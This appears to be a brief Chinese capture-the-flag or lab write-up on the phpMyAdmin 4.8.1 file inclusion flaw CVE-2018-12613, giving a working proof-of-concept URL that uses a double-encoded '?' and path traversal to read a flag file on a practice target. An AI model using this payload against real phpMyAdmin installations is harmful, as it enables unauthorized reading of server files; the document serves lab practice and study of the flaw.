知识点

  • phpmyadmin远程文件包含漏洞(CVE-2018-12613)

启动靶机

爆破出phpmyadmin,发现版本为4.8.1,存在漏洞CVE-2018-12613,poc:

  1. http://yourip:port/index.php?target=db_sql.php%253f/../../../../../../../../flag

image.png